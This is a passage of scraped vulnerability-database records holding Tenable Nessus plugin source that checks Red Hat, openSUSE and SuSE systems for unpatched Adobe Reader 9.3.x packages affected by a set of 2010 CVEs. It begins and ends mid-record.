CVE-2010-2207,\nCVE-2010-2208, CVE-2010-2209, CVE-2010-2210, CVE-2010-2211,\nCVE-2010-2212)\n\nAll Adobe Reader users should install these updated packages. They\ncontain Adobe Reader version 9.3.3, which is not vulnerable to these\nissues. All running instances of Adobe Reader must be restarted for\nthe update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1240\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1285\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1295\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1297\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2168\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2201\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2202\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2203\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2204\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2205\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2206\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2207\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2208\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2209\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2210\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2211\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2212\"\n );\n # http://www.adobe.com/support/security/advisories/apsa10-01.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/advisories/apsa10-01.html\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb10-15.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb10-15.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0503\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread and / or acroread-plugin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-164\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"newfunction\" Invalid Pointer Use');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/04/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0503\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"acroread-9.3.3-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"acroread-plugin-9.3.3-2.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"acroread-9.3.3-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"acroread-plugin-9.3.3-1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread / acroread-plugin\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:04:07", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1297, CVE-2010-1240,\nCVE-2010-1285, CVE-2010-1295, CVE-2010-2168, CVE-2010-2201,\nCVE-2010-2202, CVE-2010-2203, CVE-2010-2204, CVE-2010-2205,\nCVE-2010-2206, CVE-2010-2207, CVE-2010-2208, CVE-2010-2209,\nCVE-2010-2210, CVE-2010-2211, CVE-2010-2212).", "edition": 24, "published": "2010-07-09T00:00:00", "title": "openSUSE Security Update : acroread (openSUSE-SU-2010:0359-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "modified": "2010-07-09T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:acroread-fonts-ja", "p-cpe:/a:novell:opensuse:acroread-cmaps", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:acroread", "p-cpe:/a:novell:opensuse:acroread-fonts-ko", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW"], "id": "SUSE_11_1_ACROREAD-100708.NASL", "href": "https://www.tenable.com/plugins/nessus/47692", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-2664.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47692);\n script_version(\"1.33\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1240\", \"CVE-2010-1285\", \"CVE-2010-1295\", \"CVE-2010-1297\", \"CVE-2010-2168\", \"CVE-2010-2201\", \"CVE-2010-2202\", \"CVE-2010-2203\", \"CVE-2010-2204\", \"CVE-2010-2205\", \"CVE-2010-2206\", \"CVE-2010-2207\", \"CVE-2010-2208\", \"CVE-2010-2209\", \"CVE-2010-2210\", \"CVE-2010-2211\", \"CVE-2010-2212\");\n\n script_name(english:\"openSUSE Security Update : acroread (openSUSE-SU-2010:0359-1)\");\n script_summary(english:\"Check for the acroread-2664 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1297, CVE-2010-1240,\nCVE-2010-1285, CVE-2010-1295, CVE-2010-2168, CVE-2010-2201,\nCVE-2010-2202, CVE-2010-2203, CVE-2010-2204, CVE-2010-2205,\nCVE-2010-2206, CVE-2010-2207, CVE-2010-2208, CVE-2010-2209,\nCVE-2010-2210, CVE-2010-2211, CVE-2010-2212).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=612064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-07/msg00005.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-164\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"newfunction\" Invalid Pointer Use');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-9.3.3-2.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-cmaps-9.3.3-2.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-fonts-ja-9.3.3-2.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-fonts-ko-9.3.3-2.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-fonts-zh_CN-9.3.3-2.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-fonts-zh_TW-9.3.3-2.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:42:58", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code. The fixed security issues have been\ntracked as :\n\n - CVE-2010-1297\n\n - CVE-2010-1240\n\n - CVE-2010-1285\n\n - CVE-2010-1295\n\n - CVE-2010-2168\n\n - CVE-2010-2201\n\n - CVE-2010-2202\n\n - CVE-2010-2203\n\n - CVE-2010-2204\n\n - CVE-2010-2205\n\n - CVE-2010-2206\n\n - CVE-2010-2207\n\n - CVE-2010-2208\n\n - CVE-2010-2209\n\n - CVE-2010-2210\n\n - CVE-2010-2211\n\n - CVE-2010-2212", "edition": 23, "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : acroread (ZYPP Patch Number 7087)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "modified": "2011-01-27T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_ACROREAD-7087.NASL", "href": "https://www.tenable.com/plugins/nessus/51701", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51701);\n script_version(\"1.32\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1240\", \"CVE-2010-1285\", \"CVE-2010-1295\", \"CVE-2010-1297\", \"CVE-2010-2168\", \"CVE-2010-2201\", \"CVE-2010-2202\", \"CVE-2010-2203\", \"CVE-2010-2204\", \"CVE-2010-2205\", \"CVE-2010-2206\", \"CVE-2010-2207\", \"CVE-2010-2208\", \"CVE-2010-2209\", \"CVE-2010-2210\", \"CVE-2010-2211\", \"CVE-2010-2212\");\n\n script_name(english:\"SuSE 10 Security Update : acroread (ZYPP Patch Number 7087)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code. The fixed security issues have been\ntracked as :\n\n - CVE-2010-1297\n\n - CVE-2010-1240\n\n - CVE-2010-1285\n\n - CVE-2010-1295\n\n - CVE-2010-2168\n\n - CVE-2010-2201\n\n - CVE-2010-2202\n\n - CVE-2010-2203\n\n - CVE-2010-2204\n\n - CVE-2010-2205\n\n - CVE-2010-2206\n\n - CVE-2010-2207\n\n - CVE-2010-2208\n\n - CVE-2010-2209\n\n - CVE-2010-2210\n\n - CVE-2010-2211\n\n - CVE-2010-2212\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1240.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1285.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1295.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1297.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2168.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2201.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2202.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2203.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2204.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2205.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2206.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2207.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2208.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2209.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2210.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2211.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2212.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7087.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-164\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"newfunction\" Invalid Pointer Use');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-9.3.3-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-cmaps-9.3.3-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-fonts-ja-9.3.3-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-fonts-ko-9.3.3-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-fonts-zh_CN-9.3.3-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-fonts-zh_TW-9.3.3-0.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:43:07", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code. The fixed security issues have been\ntracked as :\n\n - CVE-2010-1297\n\n - CVE-2010-1240\n\n - CVE-2010-1285\n\n - CVE-2010-1295\n\n - CVE-2010-2168\n\n - CVE-2010-2201\n\n - CVE-2010-2202\n\n - CVE-2010-2203\n\n - CVE-2010-2204\n\n - CVE-2010-2205\n\n - CVE-2010-2206\n\n - CVE-2010-2207\n\n - CVE-2010-2208\n\n - CVE-2010-2209\n\n - CVE-2010-2210\n\n - CVE-2010-2211\n\n - CVE-2010-2212", "edition": 23, "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : acroread (ZYPP Patch Number 7086)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "modified": "2011-01-27T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_ACROREAD_JA-7086.NASL", "href": "https://www.tenable.com/plugins/nessus/51713", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51713);\n script_version(\"1.32\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1240\", \"CVE-2010-1285\", \"CVE-2010-1295\", \"CVE-2010-1297\", \"CVE-2010-2168\", \"CVE-2010-2201\", \"CVE-2010-2202\", \"CVE-2010-2203\", \"CVE-2010-2204\", \"CVE-2010-2205\", \"CVE-2010-2206\", \"CVE-2010-2207\", \"CVE-2010-2208\", \"CVE-2010-2209\", \"CVE-2010-2210\", \"CVE-2010-2211\", \"CVE-2010-2212\");\n\n script_name(english:\"SuSE 10 Security Update : acroread (ZYPP Patch Number 7086)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code. The fixed security issues have been\ntracked as :\n\n - CVE-2010-1297\n\n - CVE-2010-1240\n\n - CVE-2010-1285\n\n - CVE-2010-1295\n\n - CVE-2010-2168\n\n - CVE-2010-2201\n\n - CVE-2010-2202\n\n - CVE-2010-2203\n\n - CVE-2010-2204\n\n - CVE-2010-2205\n\n - CVE-2010-2206\n\n - CVE-2010-2207\n\n - CVE-2010-2208\n\n - CVE-2010-2209\n\n - CVE-2010-2210\n\n - CVE-2010-2211\n\n - CVE-2010-2212\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1240.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1285.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1295.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1297.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2168.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2201.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2202.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2203.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2204.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2205.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2206.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2207.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2208.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2209.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2210.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2211.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2212.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7086.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-164\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", 